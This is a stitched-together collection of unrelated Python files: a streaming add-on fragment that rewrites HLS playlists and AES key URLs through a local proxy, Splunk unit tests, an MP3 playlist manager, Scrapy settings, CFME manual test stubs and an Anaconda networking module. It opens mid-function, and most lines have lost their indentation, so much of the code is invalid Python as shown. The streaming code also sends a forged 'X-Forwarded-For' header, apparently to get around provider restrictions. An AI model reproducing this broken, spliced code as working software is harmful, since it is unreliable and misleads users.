elif (qbitrate * (100 - BITRATERANGE)) / 100 < bitrate and (qbitrate * (100 + BITRATERANGE)) / 100 > bitrate:
m3u8_url = video_index.get('uri')
if ((m3u8_url is None) and (qbitrate is None)):
m3u8_url = lm3u8_url
m3u8_data = connection.getURL(m3u8_url, loadcookie = True, cookiefile = i)
key_url = re.compile('URI="(.*?)"').findall(m3u8_data)[0]
key_data = connection.getURL(key_url, loadcookie = True, cookiefile = i)
key_file = open(ustvpaths.KEYFILE % str(i), 'wb')
key_file.write(key_data)
key_file.close()
                video_url = re.compile('(http:.*?)\n').findall(m3u8_data)
                # Rewrite every segment URL to go through the local proxy on
                # port 12345; the original URL is base64-encoded into the path
                # so the proxy can decode and fetch it.
                for video_item in video_url:
                    newurl = base64.b64encode(video_item)
                    newurl = urllib.quote_plus(newurl)
                    m3u8_data = m3u8_data.replace(video_item, 'http://127.0.0.1:12345/' + str(i) + '/foxstation/' + newurl)
                # Point the AES key URI at the proxy as well.
                m3u8_data = m3u8_data.replace(key_url, 'http://127.0.0.1:12345/play%s.key' % str(i))
file_name = ustvpaths.PLAYFILE.replace('.m3u8', str(i) + '.m3u8')
playfile = open(file_name, 'w')
playfile.write(m3u8_data)
playfile.close()
else:
print "********************* No sel*****************"
file_name = video_menu
player._localHTTPServer = False
queue.put([i, file_name, duration, closedcaption])
except:
pass
def list_qualities(BASE, video_url = common.args.url, media_base = VIDEOURL):
bitrates = []
if media_base not in video_url:
video_url = media_base + video_url
exception = False
if 'feed' not in video_url:
swf_url = connection.getRedirect(video_url, header = {'Referer' : BASE})
params = dict(item.split("=") for item in swf_url.split('?')[1].split("&"))
uri = urllib.unquote_plus(params['uri'])
config_url = urllib.unquote_plus(params['CONFIG_URL'].replace('Other', DEVICE))
config_data = connection.getURL(config_url, header = {'Referer' : video_url, 'X-Forwarded-For' : '12.13.14.15'})
config_tree = BeautifulSoup(config_data, 'html.parser')
if not config_tree.error:
feed_url = config_tree.feed.string
feed_url = feed_url.replace('{uri}', uri).replace('&', '&').replace('{device}', DEVICE).replace('{ref}', 'None').replace('{type}', 'normal').strip()
else:
exception = True
error_text = config_tree.error.string.split('/')[-1].split('_')
common.show_exception(error_text[1], error_text[2])
else:
feed_url = video_url
if not exception:
feed_data = connection.getURL(feed_url)
video_tree = BeautifulSoup(feed_data, 'html.parser', parse_only = SoupStrainer('media:group'))
video_segments = video_tree.find_all('media:content')
video_segment = video_segments[0]
video_url3 = video_segment['url'].replace('{device}', DEVICE)
video_data3 = connection.getURL(video_url3, header = {'X-Forwarded-For' : '12.13.14.15'})
video_tree3 = BeautifulSoup(video_data3, 'html.parser')
video_menu = video_tree3.find('src').string
m3u8_url = None
m3u_master_data = connection.getURL(video_menu, savecookie = True)
m3u_master = m3u8.parse(m3u_master_data)
for video_index in m3u_master.get('playlists'):
bitrate = int(video_index.get('stream_info')['bandwidth'])
display = int(bitrate) / 1024
bitrates.append((display, bitrate))
return bitrates
def list_qualities2(API, video_url = common.args.url):
video_bitrates = []
video_data = connection.getURL(API + 'playlists/%s/videos.json' % video_url)
video_tree = simplejson.loads(video_data)
video_mgid = video_tree['playlist']['videos'][0]['video']['mgid']
video_data2 = connection.getURL(VIDEOURLAPI % video_mgid)
video_tree2 = BeautifulSoup(video_data2, 'html.parser')
video_url2 = video_tree2.findAll('rendition')
for video_index in video_url2:
video_bitrate = int(video_index['bitrate'])
video_bitrates.append((video_bitrate, video_bitrate))
return video_bitrates
def convert_subtitles(closedcaption):
str_output = ''
count = 0
for closedcaption_url, i in closedcaption:
count = int(i) + 1
if closedcaption_url is not None:
try:
cc_content = common.smart_unicode(connection.getURL(closedcaption_url, connectiontype = 0).replace(' 9137', ''))
reader = detect_format(cc_content)
if reader:
str_output = common.smart_utf8(SRTWriter().write(reader().read(cc_content)))
file = open(os.path.join(ustvpaths.DATAPATH, 'subtitle-%s.srt' % str(count)), 'w')
file.write(str_output)
str_output=''
file.close()
else:
print "Unknown sub type"
except Exception, e:
print "Exception with Subs: ", e
|
import sys, unittest
sys.path.append('../bin')
sample_input_1 = open('sample_input_from_splunk_1.csv', 'r')
sample_input_2 = open('sample_input_from_splunk_2.csv', 'r')
sys.stdin = sample_input_1
import stateChange
class RSVSTARTTestCase(unittest.TestCase):
def setUp(self):
# for these tests, we expect some input from Splunk
sys.stdin = sample_input_1
stateChange.node_states = {}
stateChange.node_trasitions = {}
stateChange.output_results = []
stateChange.trigger_options = {}
def test_state_change_for_simple_set(self):
stateChange.trigger_options['-SYS_Threshold'] = 2
stateChange.trigger_options['USR-ERR_Threshold'] = 1
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'2', 'nids':'n2'}, 'n5', '*', 'SYS')
stateChange.update_output_results_for_node({'_time':'3', 'nids':'n6'}, 'n6', '*', 'SYS')
self.assertEqual(stateChange.output_results[1], {'_time':'1', 'systemStateChange':'USR-ERR', 'crossing': 'increasing'})
self.assertEqual(stateChange.output_results[-1], {'_time':'3', 'systemStateChange':'UNK-SYS', 'crossing': 'increasing'})
def test_state_change_for_simple_set2(self):
# return # IGNORE FOR NOW, but would be nice to base thresholds on a single state rather than transition
stateChange.trigger_options['SYS_Threshold'] = 2
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'2', 'nids':'n2'}, 'n5', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'3', 'nids':'n6'}, 'n6', 'ERR', 'SYS')
self.assertEqual(stateChange.output_results[-1], {'_time':'3', 'systemStateChange':'SYS', 'crossing': 'increasing'})
class TriggerEventsTestCase(unittest.TestCase):
def setUp(self):
# for these tests, we expect some input from Splunk
sys.stdin = sample_input_1
stateChange.node_states = {}
stateChange.node_trasitions = {}
stateChange.output_results = []
stateChange.trigger_options = {}
def test_state_change_for_simple_set(self):
stateChange.trigger_options['SYS-ERR_Threshold'] = 2
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'2', 'nids':'n2'}, 'n5', 'SYS', 'ERR')
stateChange.update_output_results_for_node({'_time':'3', 'nids':'n6'}, 'n6', 'SYS', 'ERR')
self.assertEqual(stateChange.output_results[-1], {'_time':'3', 'systemStateChange':'SYS-ERR', 'crossing': 'increasing'})
def test_state_change_for_more_complex_set(self):
stateChange.trigger_options['SYS-ERR_Threshold'] = 2
stateChange.trigger_options['ERR-USR_Threshold'] = 3
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'2', 'nids':'n5'}, 'n5', 'SYS', 'ERR') # + 1 for sys-err
stateChange.update_output_results_for_node({'_time':'3', 'nids':'n6'}, 'n6', 'SYS', 'ERR') # + 1 for sys-err trigger up for sys-err
stateChange.update_output_results_for_node({'_time':'4', 'nids':'n5'}, 'n5', 'ERR', 'USR') # - 1 for sys-err, + 1 for err-usr, trigger down for sys-err
stateChange.update_output_results_for_node({'_time':'5', 'nids':'n6'}, 'n6', 'ERR', 'USR') # + 1 for err-usr
stateChange.update_output_results_for_node({'_time':'6', 'nids':'n7'}, 'n7', 'ERR', 'USR') # + 1 for err-usr, trigger up for err-usr
stateChange.update_output_results_for_node({'_time':'7', 'nids':'n8'}, 'n8', 'ERR', 'USR') # + 1 for err-usr
self.assertTrue({'_time':'3', 'systemStateChange':'SYS-ERR', 'crossing': 'increasing'} in stateChange.output_results)
self.assertTrue({'_time':'4', 'systemStateChange':'SYS-ERR', 'crossing': 'decreasing'} in stateChange.output_results)
self.assertTrue({'_time':'6', 'systemStateChange':'ERR-USR', 'crossing': 'increasing'} in stateChange.output_results)
self.assertTrue({'_time':'3', 'nids':'n6', 'nodeStateChange': 'SYS-ERR', 'ERR':2, 'SYS':0} in stateChange.output_results)
self.assertTrue({'_time':'4', 'nids':'n5', 'nodeStateChange': 'ERR-USR', 'USR':1, 'ERR':1} in stateChange.output_results)
self.assertTrue({'_time':'6', 'nids':'n7', 'nodeStateChange': 'ERR-USR', 'USR':3, 'ERR':0} in stateChange.output_results)
class AggregateEventsTestCase(unittest.TestCase):
def setUp(self):
# for these tests, we expect some input from Splunk
sys.stdin = sample_input_1
stateChange.node_states = {}
stateChange.output_results = []
def test_output_results_should_contain_an_aggregate_event(self):
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n2', 'USR', 'ERR')
stateChange.build_aggregate_event({'_time':'1'})
self.assertEqual(stateChange.output_results[-1], {'_time':'1', 'eventtype':'nodeStateList', 'StateName_SYS':'n1', 'StateName_ERR': 'n2'})
def test_more_complicated_output_results_should_contain_an_aggregate_event(self):
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n2', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n3', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n4', 'USR', 'ERR')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n5', 'USR', 'SYS')
stateChange.update_output_results_for_node({'_time':'1', 'nids':'n2'}, 'n6', 'USR', 'SYS')
stateChange.build_aggregate_event({'_time':'1'})
self.assertEqual(stateChange.output_results[-1], {'_time':'1', 'eventtype':'nodeStateList', 'StateName_SYS':'n[1,5-6]', 'StateName_ERR': 'n[2-4]'})
class DefaultStateTestCase(unittest.TestCase):
def setUp(self):
# for these tests, we expect some input from Splunk
sys.stdin = sample_input_1
stateChange.node_states = {}
stateChange.output_results = []
stateChange.options['addAggregate'] = False
def test_store_current_state(self):
self.assertEqual(stateChange.node_states, {})
stateChange.store_current_state('n1', 'ERR')
self.assertEqual(stateChange.node_states, {'n1':'ERR'})
def test_get_current_state(self):
self.assertEqual(stateChange.node_states, {})
stateChange.store_current_state('n1', 'ERR')
self.assertEqual(stateChange.get_current_state('n1'), 'ERR')
def test_get_current_state_with_does_not_exist(self):
self.assertEqual(stateChange.node_states, {})
stateChange.store_current_state('n1', 'ERR')
self.assertEqual(stateChange.get_current_state('n2'), None)
def test_update_output_results_should_produce_output_since_state_is_assumed(self):
self.assertEqual(stateChange.output_results, [])
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'nids':'n1'}, 'n1', 'USR', 'SYS')
self.assertEqual(stateChange.output_results, [{'nids':'n1', '_time': None, 'nodeStateChange':'USR-SYS', 'SYS':1, 'USR':0}])
def test_update_output_results_should_produce_output_since_state_is_assumed_2(self):
self.assertEqual(stateChange.output_results, [])
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'nids':'n1'}, 'n1', 'USR', 'SYS')
self.assertEqual(stateChange.output_results, [{'nids':'n1', '_time': None, 'nodeStateChange':'USR-SYS', 'SYS':1, 'USR':0}])
def test_update_output_results_should_produce_output_only_if_state_changed_or_has_to_be_assumed(self):
self.assertEqual(stateChange.output_results, [])
# record, node, start_state, end_state
stateChange.update_output_results_for_node({'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'nids':'n2'}, 'n2', 'USR', 'SYS')
stateChange.update_output_results_for_node({'nids':'n1'}, 'n1', 'USR', 'SYS')
stateChange.update_output_results_for_node({'nids':'n2'}, 'n2', 'SYS', 'ERR')
self.assertEqual(stateChange.output_results, [{'nids':'n1', '_time': None, 'nodeStateChange':'USR-SYS', 'SYS':1, 'USR':0}, {'nids':'n2', '_time': None, 'nodeStateChange':'USR-SYS', 'SYS':2, 'USR':0}, {'nids':'n2', '_time': None, 'nodeStateChange':'SYS-ERR', 'ERR':1, 'SYS':1}])
suite1 = unittest.TestLoader().loadTestsFromTestCase(DefaultStateTestCase)
suite2 = unittest.TestLoader().loadTestsFromTestCase(AggregateEventsTestCase)
suite3 = unittest.TestLoader().loadTestsFromTestCase(TriggerEventsTestCase)
suite4 = unittest.TestLoader().loadTestsFromTestCase(RSVSTARTTestCase)
unittest.TextTestRunner(verbosity=2).run(suite4)
|
import eyeD3
import os
import json
import pyglet
import random
import time
class Song():
""" A single song
"""
def __init__(self, collection_path):
""" Init a song
        @param collection_path: The path containing the music collection
"""
self.collection_path = collection_path
self.meta = {}
self.source = None
self.player = None
def play(self):
""" Play the song
http://guzalexander.com/2012/08/17/playing-a-sound-with-python.html
"""
self.source = pyglet.media.load(os.path.join(self.collection_path, self.meta["Filename"]))
self.player = pyglet.media.Player()
self.player.queue(self.source)
self.player.play()
        pyglet.app.run()  # NOTE: blocks in the pyglet event loop until the app exits
# on ubuntu install libavbin0
def stop(self):
""" Stop a Song
"""
print ("Stopping")
        if self.player is not None:
self.player.stop()
def pause(self):
""" Pause a Song
"""
        if self.player is not None:
self.player.pause()
def from_data(self, data):
""" Create a song from data
@param data: A dict in meta style
"""
self.meta = data
def from_file(self, filename):
""" Generate entry from a mp3 file
@param filename: The file name relative to the collection path
"""
fullname = os.path.join(self.collection_path, filename)
if eyeD3.isMp3File(fullname):
audioFile = eyeD3.Mp3AudioFile(fullname)
tag = audioFile.getTag()
if tag:
self.meta["Error"] = None
self.meta["Album"] = tag.getAlbum().encode("utf-8")
self.meta["Artist"] = tag.getArtist().encode("utf-8")
self.meta["DiscNum"] = tag.getDiscNum()[0]
self.meta["DiscNumMax"] = tag.getDiscNum()[1]
try:
if tag.getGenre():
self.meta["Genre"] = tag.getGenre().getName().encode("utf-8")
except eyeD3.tag.GenreException:
self.meta["Error"] = "Broken Genre"
pass # Genre string cannot be parsed with '^([A-Z 0-9+/\-\|!&'\.]+)([,;|][A-Z 0-9+/\-\|!&'\.]+)*$': Hörbuch für Kinder
self.meta["Title"] = tag.getTitle().encode("utf-8")
#self.meta["Images"] = tag.getImages()
self.meta["TrackNum"] = tag.getTrackNum()[0]
self.meta["TrackNumMax"] = tag.getTrackNum()[1]
#self.meta["Urls"] = tag.getURLs()
self.meta["Year"] = tag.getYear()
#self.meta["FileIDs"] = tag.getUniqueFileIDs()
self.meta["Filename"] = filename
def __str__(self):
""" Print the song
"""
res = ""
for key in self.meta:
res += "%s %s \n" %(key, self.meta[key])
return res
def get_data(self):
""" Return the meta data
"""
return self.meta
class Playlist():
""" A playlist of several songs
"""
def __init__(self, collection_path, album = None, pid = None):
"""
@param collection_path: Path where the whole collection is stored
@param pid: Playlist id
@param album: The album name as id. Collisions are possible !
"""
self.collection_path = collection_path
self.data = {"songs":[],
"album": album,
"pid": pid}
def get_pid(self):
""" Return Playlist ID
"""
return self.data["pid"]
def create_card(self):
""" Create a card
"""
# Todo Create and print a card
pass
def add_song(self, song):
""" Add a song
"""
self.data["songs"].append(song)
# TODO Sort titles in album by Track number
def load_from_data(self):
""" Load from db file
"""
# TODO: Maybe ? Load a playlist from data
pass
def get_data(self):
""" return data in playlist
"""
res = {"album": self.data["album"],
"pid": self.data["pid"],
"songs": []}
for song in self.data["songs"]:
res["songs"].append(song.get_data())
return res
def from_data(self, data):
""" Generate a playlist from dumped data
"""
self.data = {"album": data["album"],
"pid": data["pid"],
"songs":[]}
for s in data["songs"]:
news = Song(self.collection_path)
news.from_data(s)
self.add_song(news)
class Playlists():
""" All playlists available
"""
def __init__(self, collection_path, filename = None):
"""
@param collection_path: Path where the collection is stored
@param filename: Filename of the DB to store in
"""
self.collection_path = collection_path
self.playlists = {} # id:playlist
self.filename = filename
def load_from_file(self, filename=None):
""" Load playlists from json file
        @param filename: JSON db filename. If None, taken from the central object's filename
"""
if filename is None:
filename = self.filename
with open(filename) as fh:
data = json.load(fh)
for pl in data:
newpl = Playlist(self.collection_path)
newpl.from_data(pl)
self.playlists[newpl.get_pid()] = newpl
def save_to_file(self, filename = None):
""" Save Playlist to json file
@param,filename: Filename for the playlist. If None it is taken from playlist central
"""
if filename is None:
filename = self.filename
sdata = []
for pl in self.playlists:
sdata.append(self.playlists[pl].get_data())
with open(filename, "wt") as fh:
json.dump(sdata, fh, indent = 4)
def get_playlist_by_id(self, pid):
""" Get a playlist by id
@param pid: playlist id
"""
if pid in self.playlists:
return self.playlists[pid]
return None
def get_playlist_by_album(self, album):
""" Get playlist by album title
@param album: album name
"""
for pid in self.playlists:
pl = self.playlists[pid]
if pl.data["album"] == album:
return pl
return None
def generate_new_id(self):
""" Generate a new random, unused id
"""
# TODO: create track ID in 8 Byte style for punchcard holes
r = random.randint(0,10000)
while (self.get_playlist_by_id(r)):
r = random.randint(0,10000)
return r
def new_playlist(self, album = None):
""" Create a new playlist
@param album: Album that is the base for this playlist
"""
        pid = self.generate_new_id()
        p = Playlist(self.collection_path, album=album, pid=pid)
        self.playlists[pid] = p
        return p
def album_playlist_from_song_db(self, songdb):
""" Take a song db and create all album playlists
@param songdb: The song database class. Albums will be extracted
"""
for song in songdb.db:
try:
al = song.meta["Album"]
            except KeyError:
                pass  # song has no album tag
else:
pl = self.get_playlist_by_album(al)
if not pl:
pl = self.new_playlist(album = al)
pl.add_song(song)
def __str__(self):
res = ""
res += "Playlists in db: %d" % len(self.playlists)
return res
class SongDB():
""" A List of all songs
"""
def __init__(self, basedir, filename, new = False):
"""
@param basedir: The dir of the collection
@param filename: The name of the json db
@param new: Create new db vs load
"""
self.filename = filename
self.basedir = basedir
if new:
self.db = self.create_new()
else:
self.db = self.load()
def load(self, filename=None):
""" Load song db from json file
@param filename: Filename for loading. If None it will be the central class filename
"""
res = []
if filename is None:
filename = self.filename
with open(filename) as fh:
data = json.load(fh)
for sdata in data:
s = Song(self.basedir)
s.from_data(sdata)
res.append(s)
return res
def create_new(self):
return []
def update_from_dir(self):
""" Update the current database from MP3 files in the directory
"""
for subdir, dirs, files in os.walk(self.basedir):
for file in files:
fullpath = os.path.join(subdir, file)
relpath = os.path.relpath(fullpath, self.basedir)
s = Song(self.basedir)
s.from_file(relpath)
self.db.append(s)
print (len(self.db))
def save(self, filename=None):
""" Save playlist to json file
@param filename: Filename for the db. If None, it will be the central class name
"""
if filename is None:
filename = self.filename
data = []
for asong in self.db:
data.append(asong.get_data())
with open(filename, "wt") as fh:
json.dump(data, fh, indent = 4)
def __str__(self):
res = ""
res += str(len(self.db))
return res
if __name__ == "__main__":
sdb = SongDB("/home/thorsten/Musik", "test.json", False)
print (sdb)
song = sdb.db[0]
song.play()
time.sleep(2)
song.stop()
#sdb.update_from_dir()
#sdb.save()
#sdb.cards()
#p = Playlists("/home/thorsten/Musik", filename="playlist.json")
#p.album_playlist_from_song_db(sdb)
#p.load_from_file()
#print(p)
#p.save_to_file()
|
VERSION = (0, 3)
__version__ = ".".join(map(str, VERSION[0:2])) + "".join(VERSION[2:])
__license__ = "BSD"
from pyfttt.sending import *
|
from pathlib import Path
BOT_NAME = 'reddit_scrapers'
SPIDER_MODULES = ['reddit_scrapers.spiders']
NEWSPIDER_MODULE = 'reddit_scrapers.spiders'
ROBOTSTXT_OBEY = True
DOWNLOAD_DELAY = 7
ITEM_PIPELINES = {
'scrapy.pipelines.images.ImagesPipeline': 1
}
IMAGES_STORE = str(Path.home() / 'EarthPorn')
IMAGES_EXPIRES = None
MEDIA_ALLOW_REDIRECTS = True
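# Note (assumption based on standard Scrapy behavior): ImagesPipeline needs
# Pillow installed and items that expose an 'image_urls' field; downloaded
# images are written under IMAGES_STORE, here ~/EarthPorn.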
|
"""
Classes for the L{Dispatchator<base.Dispatchator>}. Only L{the factory
<factory.make_dispatchator>} is directly accessible at the module level.
"""
from __future__ import absolute_import
from vigilo.vigiconf.lib.dispatchator.factory import make_dispatchator
__all__ = ("make_dispatchator", )
|
"""Manual tests"""
import pytest
from cfme import test_requirements
@pytest.mark.manual
@test_requirements.settings
@pytest.mark.tier(3)
def test_validate_landing_pages_for_rbac():
"""
Bugzilla:
1450012
Polarion:
assignee: pvala
casecomponent: Settings
caseimportance: medium
initialEstimate: 1/5h
setup:
1. Create a new role by selecting a few product features.
2. Create a group with the new role.
3. Create a new user with the new group.
4. Logout.
5. Login back with the new user.
6. Navigate to My Settings > Visual.
testSteps:
            1. Check the start page entries in the `Show at login` dropdown list
        expectedResults:
            1. Landing pages which the user has access to must be present in the dropdown list.
"""
pass
@pytest.mark.manual
@test_requirements.configuration
@pytest.mark.tier(1)
def test_configure_icons_roles_by_server():
"""
Polarion:
assignee: tpapaioa
casecomponent: Configuration
caseimportance: low
initialEstimate: 1/15h
testSteps:
1. Go to Settings -> Configuration and enable all Server Roles.
            2. Navigate to Settings -> Configuration -> Diagnostics -> CFME Region ->
Roles by Servers.
3. Click through all Roles and look for missing icons.
expectedResults:
1.
2.
3. No icons are missing
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_replication_subscription_crud():
"""
Add/Edit/Remove replication subscription
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: critical
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Try adding subscription to second appliance with wrong password in first appliance
6. Update not working subscription to use correct password
7. Delete subscription
expectedResults:
1.
2.
3.
4.
            5. Subscription was added. User was warned that the subscription wasn't established.
Provider didn't show up in global appliance.
6. Provider and its data showed up in global region appliance
7. Subscription was deleted. Provider and its data disappeared from global region
appliance.
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_add_duplicate_subscription():
"""
Try adding duplicate record
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: low
caseposneg: negative
initialEstimate: 1/6h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Add subscription to second appliance in first appliance
6. Try adding second subscription to second appliance in first appliance
expectedResults:
1.
2.
3.
4.
5.
6. Second subscription hasn't been added. Warning message has appeared
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_add_bad_subscription():
"""
    Try adding bad subscriptions, e.g.:
    1. remote appliance doesn't have remote replication type set
    2. remote appliance isn't available, etc.
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseposneg: negative
caseimportance: low
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Try adding subscription to second appliance in first appliance with wrong values
expectedResults:
1.
2.
3.
4.
5. Subscription hasn't been added. Add subscription task has failed
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_edit_bad_subscription():
"""
    Try changing subscriptions from good to bad or vice versa
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseposneg: negative
caseimportance: low
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
            5. Try changing existing subscription values to wrong ones, e.g. a wrong password
expectedResults:
1.
2.
3.
4.
5. Subscription shouldn't be changed if connection couldn't be established.
Subscription update task should fail
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_cancel_subscription():
"""
Try canceling adding/changing/removing subscriptions
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: low
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Try canceling adding/changing/removing subscription
expectedResults:
1.
2.
3.
4.
            5. The changes should be canceled
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_change_subscription_type():
"""
Try setting/removing global/remote subscription
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: low
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Add subscription to second appliance
6. Change subscription type from Global to None
7. Restore Global subscription type and subscription to remote appliance
8. Change Remote subscription type to None
9. Restore Remote subscription type
expectedResults:
1.
2.
3.
4.
5.
6.
7.
8.
            9. Remote appliance data should disappear from the global appliance when the Global
               or Remote subscription type is changed to None.
               Remote appliance data should appear again when both Global and Remote
               subscription types are set
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.tier(3)
def test_subscription_disruption():
"""
Test restoring subscription after temporary disruptions
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseposneg: negative
caseimportance: medium
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Add subscription to second appliance in first appliance
            6. Add some disruption in the connection between the global and remote appliances,
               e.g. add an iptables rule to reject packets from one appliance to the other
7. Try provisioning vm from global appliance
8. Make some noticeable changes in remote appliance's provider
9. Remove disruption
10. Try provisioning vm again
expectedResults:
1.
2.
3.
4.
5.
6.
            7. VM was not provisioned. The error/warning should clearly describe the reason
            8.
            9. Subscription was restored. VM was provisioned. Changes made in the remote appliance
               appeared in the global appliance
"""
pass
@pytest.mark.manual
@test_requirements.settings
@test_requirements.multi_region
@pytest.mark.meta(coverage=[1741240])
@pytest.mark.tier(3)
def test_subscription_region_unavailable():
"""
    Tests that the Replication tab opens without issues or a 502 error when the
    remote region has become unavailable
Polarion:
assignee: izapolsk
casecomponent: Configuration
caseimportance: high
initialEstimate: 1/4h
testSteps:
1. Set up two appliances where first appliance resides in global region (99) and
second one resides in remote region (10). Those should use the same security key
2. Add a provider to second appliance
3. Set replication subscription type to Remote in second appliance
4. Set replication subscription type to Global in first appliance
5. Add subscription to second appliance in first appliance
6. Stop postgresql service in remote appliance
7. Go to Configuration->Settings-><Current Region>->Replication tab
expectedResults:
1.
2.
3.
4.
5.
6.
            7. Replication tab takes a long time to open and finally displays a 502 error alert
"""
pass
|
import gi
gi.require_version("NetworkManager", "1.0")
from gi.repository import NetworkManager
import shutil
from pyanaconda import iutil
import socket
import os
import time
import threading
import re
import dbus
import ipaddress
from uuid import uuid4
import itertools
import glob
from pyanaconda.simpleconfig import SimpleConfigFile
from blivet.devices import FcoeDiskDevice
import blivet.arch
from pyanaconda import nm
from pyanaconda import constants
from pyanaconda.flags import flags, can_touch_runtime_system
from pyanaconda.i18n import _
from pyanaconda.regexes import HOSTNAME_PATTERN_WITHOUT_ANCHORS
import logging
log = logging.getLogger("anaconda")
sysconfigDir = "/etc/sysconfig"
netscriptsDir = "%s/network-scripts" % (sysconfigDir)
networkConfFile = "%s/network" % (sysconfigDir)
hostnameFile = "/etc/hostname"
ipv6ConfFile = "/etc/sysctl.d/anaconda.conf"
ifcfgLogFile = "/tmp/ifcfg.log"
DEFAULT_HOSTNAME = "localhost.localdomain"
ifcfglog = None
network_connected = None
network_connected_condition = threading.Condition()
def setup_ifcfg_log():
# Setup special logging for ifcfg NM interface
from pyanaconda import anaconda_log
global ifcfglog
logger = logging.getLogger("ifcfg")
logger.setLevel(logging.DEBUG)
anaconda_log.logger.addFileHandler(ifcfgLogFile, logger, logging.DEBUG)
anaconda_log.logger.forwardToSyslog(logger)
ifcfglog = logging.getLogger("ifcfg")
def check_ip_address(address, version=None):
"""
Check if the given IP address is valid in given version if set.
:param str address: IP address for testing
:param int version: ``4`` for IPv4, ``6`` for IPv6 or
``None`` to allow either format
:returns: ``True`` if IP address is valid or ``False`` if not
:rtype: bool
"""
try:
if version == 4:
ipaddress.IPv4Address(address)
elif version == 6:
ipaddress.IPv6Address(address)
elif not version: # any of those
ipaddress.ip_address(address)
else:
log.error("IP version %s is not supported", version)
return False
return True
except ValueError:
return False
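# Examples:
#   check_ip_address("10.0.0.1", version=4) -> True
#   check_ip_address("::1", version=4)      -> False (valid only as IPv6)
#   check_ip_address("::1")                 -> True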
def sanityCheckHostname(hostname):
"""
Check if the given string is (syntactically) a valid hostname.
:param hostname: a string to check
:returns: a pair containing boolean value (valid or invalid) and
an error message (if applicable)
:rtype: (bool, str)
"""
if not hostname:
return (False, _("Host name cannot be None or an empty string."))
if len(hostname) > 255:
return (False, _("Host name must be 255 or fewer characters in length."))
if not (re.match('^' + HOSTNAME_PATTERN_WITHOUT_ANCHORS + '$', hostname)):
return (False, _("Host names can only contain the characters 'a-z', "
"'A-Z', '0-9', '-', or '.', parts between periods "
"must contain something and cannot start or end with "
"'-'."))
return (True, "")
def getIPs():
""" Return a list of IP addresses for all active devices. """
ipv4_addresses = []
ipv6_addresses = []
for devname in nm.nm_activated_devices():
try:
ipv4_addresses += nm.nm_device_ip_addresses(devname, version=4)
ipv6_addresses += nm.nm_device_ip_addresses(devname, version=6)
except (dbus.DBusException, ValueError) as e:
log.warning("Got an exception trying to get the ip addr "
"of %s: %s", devname, e)
# prefer IPv4 addresses to IPv6 addresses
return ipv4_addresses + ipv6_addresses
def getFirstRealIP():
""" Return the first real non-local IP we find from the list of
all active devices.
:rtype: str or ``None``
"""
